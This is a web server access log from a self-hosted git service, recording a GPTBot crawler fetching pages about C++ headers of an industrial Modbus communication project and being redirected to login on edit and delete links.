"/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11789] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10339] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10142] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12983] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13355] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:58:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10139] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 2066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13998] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11316] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12257] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:18:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1007] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:58:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1590] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11574] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:18:59:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:59:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:59:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1590] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:59:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 14314] [Gzip 6.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:18:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:18:59:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10964] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:18:59:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:59:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 